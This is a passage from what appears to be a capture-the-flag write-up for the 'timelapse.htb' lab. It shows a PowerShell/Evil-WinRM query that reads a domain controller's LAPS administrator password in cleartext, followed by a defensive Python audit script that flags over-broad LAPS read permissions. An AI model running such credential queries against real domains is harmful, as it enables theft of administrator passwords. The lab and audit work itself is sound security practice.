LAPS Password Read

To read LAPS passwords, we run the following command in PowerShell.

Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd,ms-Mcs-AdmPwdExpirationTime

Notice in the output that the password is stored in the ms-Mcs-AdmPwd attribute.

*Evil-WinRM* PS C:\Users> invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime}

PSComputerName              : localhost
RunspaceId                  : ae9923c4-551b-480e-aebd-e19931fe811a
DistinguishedName           : CN=DC01,OU=Domain Controllers,DC=timelapse,DC=htb
DNSHostName                 : dc01.timelapse.htb
Enabled                     : True
ms-Mcs-AdmPwd               : 8p4Uc,AC5lJ9E]P9X7#3$10@
ms-Mcs-AdmPwdExpirationTime : 132951514281823553
Name                        : DC01
ObjectClass                 : computer
ObjectGUID                  : 6e10b102-6936-41aa-bb98-bed624c9b98f
SamAccountName              : DC01$
SID                         : S-1-5-21-671920749-559770252-3318990721-1000
UserPrincipalName           :
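
A defender-side use of the same output, as an added example that is not part of the original writeup: run the query as an account that should not be able to read LAPS passwords, then flag every computer where ms-Mcs-AdmPwd comes back populated and decode ms-Mcs-AdmPwdExpirationTime into a UTC date. The host names, sample values and function names are constructed for illustration; the first expiration value is the one shown above.

```python
import re
from datetime import datetime, timedelta, timezone

# Constructed sample in the record layout shown above (placeholder hosts and values).
SAMPLE = """\
ms-Mcs-AdmPwd               : CONSTRUCTED-PLACEHOLDER
ms-Mcs-AdmPwdExpirationTime : 132951514281823553
Name                        : WS01

ms-Mcs-AdmPwdExpirationTime : 133801632000000000
Name                        : WS02

Name                        : WS03
"""

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)

def filetime_to_utc(ticks):
    """ms-Mcs-AdmPwdExpirationTime counts 100 ns intervals since 1601-01-01 UTC."""
    return FILETIME_EPOCH + timedelta(microseconds=int(ticks) // 10)

def parse_records(text):
    """Split list-style output into one dict per computer (blank line = new record)."""
    records = []
    for block in re.split(r"\n\s*\n", text.strip()):
        pairs = (line.partition(":") for line in block.splitlines())
        fields = {k.strip(): v.strip() for k, sep, v in pairs if sep}
        if fields:
            records.append(fields)
    return records

def audit(text, now):
    """Per computer: was a password returned to this caller, and is it past expiry?"""
    report = []
    for rec in parse_records(text):
        raw = rec.get("ms-Mcs-AdmPwdExpirationTime", "")
        expires = filetime_to_utc(raw) if raw.isdigit() else None
        report.append({
            "name": rec.get("Name", "?"),
            "readable": bool(rec.get("ms-Mcs-AdmPwd")),  # the value itself is never copied
            "expires": expires,
            "expired": expires is not None and expires < now,
        })
    return report

if __name__ == "__main__":
    print(audit(SAMPLE, datetime.now(timezone.utc)))
```

A row with "readable" set to True for an account outside the intended LAPS readers points to an over-broad read permission on that computer object or its OU.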

Now we try the whole deal:

